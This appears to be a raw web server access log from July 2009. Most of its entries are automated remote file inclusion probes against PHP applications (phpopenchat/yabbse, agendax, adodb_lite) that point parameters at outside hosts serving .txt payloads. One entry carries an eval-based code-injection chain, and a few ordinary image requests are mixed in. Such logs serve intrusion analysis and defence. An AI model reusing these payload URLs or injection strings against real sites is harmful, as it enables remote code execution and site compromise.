222.236.47.192 - - [16/Jul/2009:01:58:02 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
222.236.47.192 - - [16/Jul/2009:01:58:02 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
76.163.252.93 - - [16/Jul/2009:01:58:51 -0400] "GET /logs/access_log.Q109052700%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://cornect.com/wp-content/plugins/dm-albums/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
76.163.252.93 - - [16/Jul/2009:01:58:52 -0400] "GET /logs/access_log.Q109052700%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
116.71.168.113 - - [16/Jul/2009:01:58:55 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
116.71.168.113 - - [16/Jul/2009:01:58:55 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
116.71.168.113 - - [16/Jul/2009:01:59:00 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
116.71.168.113 - - [16/Jul/2009:01:59:00 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
76.163.252.93 - - [16/Jul/2009:01:59:40 -0400] "GET /logs/access_log.Q109050900%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://cornect.com/wp-content/plugins/dm-albums/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
76.163.252.93 - - [16/Jul/2009:01:59:43 -0400] "GET /logs/access_log.Q109050900%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.236.47.192 - - [16/Jul/2009:02:00:18 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://cornect.com/wp-content/plugins/dm-albums/idade1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
222.236.47.192 - - [16/Jul/2009:02:00:18 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://cornect.com/wp-content/plugins/dm-albums/idade1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
222.236.47.192 - - [16/Jul/2009:02:00:18 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://cornect.com/wp-content/plugins/dm-albums/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:01:01 -0400] "GET /logs/access_log.Q109061800%20%20//modules/agendax/addevent.inc.php?agendax_path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:01:11 -0400] "GET /logs/access_log.Q109052300%20%20//modules/agendax/addevent.inc.php?agendax_path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.242.110.197 - - [16/Jul/2009:02:02:42 -0400] "GET /logs/access_log.Q109061300/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://sunset-travel.ro/ro/includes/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
